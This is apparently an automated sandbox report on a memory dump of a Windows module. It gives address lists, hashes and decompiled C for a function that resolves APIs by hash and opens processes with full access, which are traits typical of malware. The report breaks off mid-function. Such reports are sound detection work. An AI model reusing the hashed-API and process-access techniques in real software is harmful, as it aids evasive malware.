0x6e8e16ad
0x6e8e16b0
0x6e8e16b4
0x6e8e16b8
0x6e8e16bf
0x6e8e16d1
0x6e8e16e7
0x6e8e16f2
0x6e8e16f3
0x6e8e16f4
0x6e8e16f5
0x6e8e16f6
0x6e8e16f9
0x6e8e16fd
0x6e8e1701
0x6e8e1708
0x6e8e171a
0x6e8e1730
0x6e8e173b
0x6e8e173c
0x6e8e173d
0x6e8e173e
0x6e8e173f
0x6e8e1742
0x6e8e1746
0x6e8e174a
0x6e8e1751
0x6e8e1763
0x6e8e1779
0x6e8e1784
0x6e8e1785
0x6e8e1786
0x6e8e1787
0x6e8e1788
0x6e8e178b
0x6e8e178f
0x6e8e1793
0x6e8e179a
0x6e8e17ac
0x6e8e17c2
0x6e8e17cd
0x6e8e17ce
0x6e8e17cf
0x6e8e17d0
0x6e8e17d1
0x6e8e17d4
0x6e8e17d8
0x6e8e17dc
0x6e8e17e3
0x6e8e17f5
0x6e8e180b
0x6e8e1816
0x6e8e1817
0x6e8e1818
0x6e8e1819
0x6e8e181a
0x6e8e181d
0x6e8e1821
0x6e8e1825
0x6e8e182c
0x6e8e183e
0x6e8e1854
0x6e8e185f
0x6e8e1860
0x6e8e1861
0x6e8e1862
0x6e8e1863
0x6e8e1866
0x6e8e186a
0x6e8e186e
0x6e8e1875
0x6e8e1887
0x6e8e189d
0x6e8e18a8
0x6e8e18a9
0x6e8e18aa
0x6e8e18ab
0x6e8e18ac
0x6e8e18af
0x6e8e18b3
0x6e8e18b7
0x6e8e18be
0x6e8e18d0
0x6e8e18e6
0x6e8e18f1
0x6e8e18f2
0x6e8e18f3
0x6e8e18f4
0x6e8e18f5
0x6e8e18f8
0x6e8e18fc
0x6e8e1900
0x6e8e1907
0x6e8e1919
0x6e8e192f
0x6e8e193a
0x6e8e193b
0x6e8e193c
0x6e8e193d
0x6e8e193e
0x6e8e1941
0x6e8e1945
0x6e8e1949
0x6e8e1950
0x6e8e1962
0x6e8e1978
0x6e8e1983
0x6e8e1984
0x6e8e1985
0x6e8e1986
0x6e8e198c
0x6e8e198f
0x6e8e1991
0x6e8e199c
0x6e8e19a3
0x6e8e19ac
0x6e8e19b4
0x6e8e19bb
0x6e8e19c4
0x6e8e19cc
0x6e8e19d3
0x6e8e19dc
0x6e8e19e4
0x6e8e19eb
0x6e8e19f4
0x6e8e19fc
0x6e8e1a03
0x6e8e1a0c
0x6e8e1a14
0x6e8e1a1b
0x6e8e1a24
0x6e8e1a2c
0x6e8e1a36
0x6e8e1a3f
0x6e8e1a47
0x6e8e1a51
0x6e8e1a5a
0x6e8e1a62
0x6e8e1a6c
0x6e8e1a75
0x6e8e1a7d
0x6e8e1a87
0x6e8e1a90
0x6e8e1a98
0x6e8e1aa2
0x6e8e1aab
0x6e8e1ab3
0x6e8e1abd
0x6e8e1ac6
0x6e8e1ace
0x6e8e1ad8
0x6e8e1ae1
0x6e8e1ae9
0x6e8e1af3
0x6e8e1afc
0x6e8e1b04
0x6e8e1b0e
0x6e8e1b17
0x6e8e1b1f
0x6e8e1b26
0x6e8e1b2f
0x6e8e1b37
0x6e8e1b3e
0x6e8e1b43
0x6e8e1b51
0x6e8e1b55
0x6e8e1b64
0x6e8e1b6d
0x6e8e1b72
0x6e8e1b79
0x6e8e1b7d
0x6e8e1b81
0x6e8e1b88
0x6e8e1b9a
0x6e8e1bb0
0x6e8e1bbb
0x6e8e1bbc
0x6e8e1bbd
0x6e8e1bbe
0x6e8e1bbf
0x6e8e1bc2
0x6e8e1bc6
0x6e8e1bca
0x6e8e1bd1
0x6e8e1be3
0x6e8e1bf9
0x6e8e1c04
0x6e8e1c05
0x6e8e1c06
0x6e8e1c07
0x6e8e1c08
0x6e8e1c0b
0x6e8e1c0f
0x6e8e1c13
0x6e8e1c1a
0x6e8e1c2c
0x6e8e1c42
0x6e8e1c4d
0x6e8e1c4e
0x6e8e1c4f
0x6e8e1c50
0x6e8e1c51
0x6e8e1c54
0x6e8e1c58
0x6e8e1c5c
0x6e8e1c63
0x6e8e1c75
0x6e8e1c8b
0x6e8e1c96
0x6e8e1c97
0x6e8e1c98
0x6e8e1c99
0x6e8e1c9a
0x6e8e1c9d
0x6e8e1ca0
0x6e8e1ca1
0x6e8e1ca2
0x6e8e1ca9
0x6e8e1cac
0x6e8e1cb7
0x6e8e1cbe
0x6e8e1cc7
0x6e8e1ccf
0x6e8e1cd6
0x6e8e1cdf
0x6e8e1ce7
0x6e8e1cee
0x6e8e1cf7
0x6e8e1cff
0x6e8e1d04
0x6e8e1d0d
0x6e8e1d15
0x6e8e1d2a

Strings

8nsK, xrefs: 6E8E1900

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction ID: 9d68898505f1b4acff1162cb851bbd11f18739169b9e0940ea9796465396940a
Opcode Fuzzy Hash: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction Fuzzy Hash: 9432E6724047069BC715DF64C9509EF77A4AFB220CF204F1DB5896A1A2FF71EA8AC781

Uniqueness

Uniqueness Score: -1.00%

Function 6E8EA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6E8EA4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E8EB658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E8EF4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E8EF654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6E8F2234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E8EF654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E8EF584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E8EF584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6e8fb808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6E8F3064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E8EF4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E8EF4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E8EB5C4(_t439 + 0x34);
											E6E8EB5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6E8EB5C4(_t439 + 0x34);
										E6E8EB5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6E8EF4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E8ECA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E8EC280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E8EF828(_t439 + 0x14, E6E8EF4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E8EF4BC(_t439 + 0x14, E6E8EF4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6E8F3064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E8EF828(_t439 + 0x40, E6E8EF4CC(_t439 + 0x3c) + 4);
											 *(E6E8EF4BC(_t439 + 0x40, E6E8EF4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E8ECD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E8EF4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E8EF4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E8EAC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E8ECD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E8EF4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E8EF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E8EF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E8EF4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E8EF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6E8F38F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E8EF4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E8EF828( *((intOrPtr*)(_t439 + 8)), E6E8EF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E8EF4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E8EF4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E8EF4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E8EF4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6E8F38F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E8EF4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E8EF828( *((intOrPtr*)(_t439 + 4)), E6E8EF4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E8EF828( *((intOrPtr*)(_t439 + 8)), E6E8EF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E8EF4BC( *((intOrPtr*)(_t439 + 8)), E6E8EF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E8EF828( *((intOrPtr*)(_t439 + 4)), E6E8EF4CC( *_t439) + 4);
								 *(E6E8EF4BC( *((intOrPtr*)(_t439 + 4)), E6E8EF4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6E8EF4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6E8F3064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E8EF4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E8EF828( *((intOrPtr*)(_t439 + 8)), E6E8EF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E8EF4BC( *((intOrPtr*)(_t439 + 8)), E6E8EF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E8EF4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6E8EF828( *((intOrPtr*)(_t439 + 4)), E6E8EF4CC( *_t439) + 4);
										 *(E6E8EF4BC( *((intOrPtr*)(_t439 + 4)), E6E8EF4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E8EF4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E8EF4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E8EF4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E8EF4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E8EF4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E8EF4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6E8F38F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E8EF4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E8EF828( *((intOrPtr*)(_t439 + 4)), E6E8EF4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6E8F3064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E8EF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E8EF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E8EF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6E8EF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6E8EF4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6E8F38F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E8EF4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E8EF828( *((intOrPtr*)(_t439 + 8)), E6E8EF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E8EF4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6e8ea4f2
0x6e8ea4f4
0x6e8ea4ff
0x6e8ea505
0x6e8ea509
0x6e8ea50e
0x6e8ea514
0x6e8ea524
0x00000000
0x6e8ea526
0x6e8ea526
0x6e8ea531
0x6e8ea531
0x6e8eaaaf
0x6e8eaab1
0x6e8eaab2
0x6e8eaaf1
0x6e8eaaf5
0x6e8eab03
0x6e8eab11
0x6e8eab11
0x6e8eaafc
0x6e8eab17
0x6e8eab1c
0x00000000
0x6e8eab1c
0x6e8eab00
0x6e8eab01
0x00000000
0x6e8ea53b
0x6e8ea53b
0x6e8ea53f
0x6e8ea646
0x6e8ea646
0x6e8ea64b
0x6e8ea75c
0x6e8ea760
0x6e8ea765
0x6e8ea769
0x6e8ea893
0x6e8ea895
0x6e8ea899
0x6e8ea8a2
0x6e8ea8ab
0x6e8ea8af
0x6e8ea8b8
0x6e8ea8bf
0x6e8ea8c0
0x6e8ea8c4
0x6e8ea8c8
0x6e8ea8cc
0x6e8ea8ce
0x6e8eaa38
0x6e8eaa38
0x6e8eaa40
0x6e8eaa58
0x6e8eaa5a
0x6e8eaa5c
0x6e8eaa96
0x6e8eaa96
0x6e8eaa98
0x6e8eaa98
0x6e8eaa9b
0x6e8eaab6
0x6e8eaaca
0x6e8eaacd
0x6e8eaad2
0x6e8eaadd
0x6e8eaade
0x6e8eaae1
0x6e8eaae3
0x6e8eaaec
0x00000000
0x6e8eaaec
0x6e8eaa9d
0x6e8eaaa1
0x6e8eaaaa
0x00000000
0x6e8eaaaa
0x6e8eaa6d
0x6e8eaa7d
0x6e8eaa81
0x6e8eaa81
0x6e8eaa84
0x6e8eaa87
0x6e8eaa8a
0x6e8eaa90
0x00000000
0x00000000
0x00000000
0x6e8eaa92
0x6e8ea8d6
0x6e8ea8d6
0x6e8ea8d8
0x6e8ea8dc
0x6e8ea8e1
0x6e8ea8e3
0x6e8ea8e7
0x6e8ea8ea
0x6e8ea8f2
0x6e8ea8f4
0x00000000
0x00000000
0x6e8ea90b
0x6e8ea926
0x6e8ea928
0x6e8ea93b
0x6e8ea93d
0x6e8ea93f
0x6e8ea95a
0x6e8ea95a
0x6e8ea95e
0x6e8ea960
0x00000000
0x00000000
0x6e8ea962
0x6e8ea965
0x6e8ea986
0x6e8ea9a5
0x6e8ea9ab
0x6e8ea9ae
0x6e8ea9b3
0x6e8ea9b4
0x6e8ea9b8
0x00000000
0x00000000
0x6e8ea9c0
0x6e8ea9c0
0x6e8ea9c2
0x6e8ea9ce
0x6e8ea9da
0x6e8ea9e4
0x6e8ea9e7
0x6e8ea9ea
0x6e8ea9ee
0x6e8ea9f5
0x6e8ea9f9
0x6e8ea9fd
0x6e8ea9fe
0x6e8eaa02
0x6e8eaa07
0x6e8eaa0c
0x6e8eaa10
0x6e8eaa14
0x6e8eaa1a
0x6e8eaa20
0x6e8eaa26
0x6e8eaa2c
0x6e8eaa31
0x6e8eaa32
0x6e8eaa32
0x00000000
0x6e8ea9c2
0x00000000
0x6e8ea965
0x6e8ea943
0x6e8ea954
0x6e8ea956
0x6e8ea958
0x00000000
0x00000000
0x00000000
0x6e8ea958
0x6e8ea96b
0x00000000
0x6e8ea96b
0x6e8ea76f
0x6e8ea772
0x6e8ea774
0x00000000
0x00000000
0x6e8ea77c
0x6e8ea77c
0x6e8ea77e
0x6e8ea77e
0x6e8ea78f
0x6e8ea791
0x6e8ea794
0x00000000
0x00000000
0x6e8ea88a
0x6e8ea88b
0x6e8ea88d
0x00000000
0x00000000
0x00000000
0x6e8ea88d
0x6e8ea79a
0x6e8ea79d
0x6e8ea7a7
0x6e8ea7ac
0x6e8ea7ae
0x6e8ea7b4
0x6e8ea7bb
0x6e8ea7bf
0x6e8ea7c4
0x6e8ea7c8
0x6e8eac03
0x6e8eac17
0x6e8eac3a
0x6e8eac3f
0x6e8eac3f
0x6e8ea7df
0x6e8ea7e4
0x6e8ea7e4
0x6e8ea7e4
0x6e8ea7e4
0x6e8ea7ea
0x6e8ea7ef
0x6e8ea7f1
0x6e8ea7f6
0x6e8ea7fd
0x6e8ea802
0x6e8ea804
0x6e8eabc1
0x6e8eabd2
0x6e8eabec
0x6e8eabf1
0x6e8eabf1
0x6e8ea81a
0x6e8ea81f
0x6e8ea81f
0x6e8ea81f
0x6e8ea81f
0x6e8ea833
0x6e8ea851
0x6e8ea856
0x6e8ea866
0x6e8ea883
0x6e8ea885
0x6e8ea885
0x00000000
0x6e8ea79d
0x6e8ea653
0x6e8ea653
0x6e8ea655
0x6e8ea65c
0x6e8ea66a
0x6e8ea66c
0x6e8ea66f
0x6e8ea676
0x6e8ea678
0x6e8ea6a9
0x6e8ea6b8
0x6e8ea6ba
0x6e8ea6bc
0x6e8ea6da
0x6e8ea6dc
0x6e8ea6de
0x6e8ea6f1
0x6e8ea710
0x6e8ea716
0x6e8ea719
0x6e8ea730
0x6e8ea74c
0x6e8ea74e
0x6e8ea74e
0x6e8ea74e
0x6e8ea74e
0x6e8ea6de
0x00000000
0x6e8ea6bc
0x6e8ea67c
0x6e8ea67c
0x6e8ea67e
0x6e8ea68f
0x6e8ea691
0x6e8ea693
0x00000000
0x00000000
0x6e8ea69f
0x6e8ea6a0
0x6e8ea6a7
0x00000000
0x00000000
0x00000000
0x6e8ea6a7
0x6e8ea695
0x6e8ea698
0x00000000
0x00000000
0x6e8ea751
0x6e8ea751
0x6e8ea752
0x6e8ea752
0x00000000
0x6e8ea545
0x6e8ea547
0x6e8ea547
0x6e8ea549
0x6e8ea550
0x6e8ea55e
0x6e8ea560
0x6e8ea564
0x6e8ea568
0x6e8ea56a
0x6e8ea598
0x6e8ea59b
0x6e8ea5a0
0x6e8ea5a4
0x6e8ea5a9
0x6e8ea5b0
0x6e8ea5b5
0x6e8ea5b7
0x6e8eab7e
0x6e8eab8f
0x6e8eabaf
0x6e8eabb4
0x6e8eabb4
0x6e8ea5cd
0x6e8ea5d2
0x6e8ea5d2
0x6e8ea5d2
0x6e8ea5d2
0x6e8ea5e4
0x6e8ea5e6
0x6e8ea5e8
0x6e8ea5f9
0x6e8ea5f9
0x6e8ea5ff
0x6e8ea604
0x6e8ea608
0x6e8ea60e
0x6e8ea615
0x6e8ea61a
0x6e8ea61c
0x6e8eab32
0x6e8eab43
0x6e8eab64
0x6e8eab69
0x6e8eab69
0x6e8ea633
0x6e8ea638
0x6e8ea638
0x6e8ea638
0x6e8ea638
0x6e8ea63b
0x6e8ea63b
0x00000000
0x6e8ea63b
0x6e8ea56e
0x6e8ea56e
0x6e8ea570
0x6e8ea581
0x6e8ea583
0x6e8ea585
0x00000000
0x00000000
0x6e8ea591
0x6e8ea592
0x6e8ea596
0x00000000
0x00000000
0x00000000
0x6e8ea596
0x6e8ea587
0x6e8ea58a
0x00000000
0x00000000
0x6e8ea63c
0x6e8ea63c
0x6e8ea63d
0x6e8ea63d
0x00000000
0x6e8ea549
0x6e8ea53f

Strings

, xrefs: 6E8EAAF7

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1af1785c1d9d07dfe4d67f4f25ce61e5265362b4507fe48501de3fd4359933d6
Instruction ID: 318bfc55df28b5c179deb0f5ab456041e6a4619953eb77dd1fb9d6b710628529
Opcode Fuzzy Hash: 1af1785c1d9d07dfe4d67f4f25ce61e5265362b4507fe48501de3fd4359933d6
Instruction Fuzzy Hash: 2E12A2315083019FD714DFA8D980AAEB7B9EFD6708F104E6DE999976A1DB30DD01CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6E8E8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E8E8428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
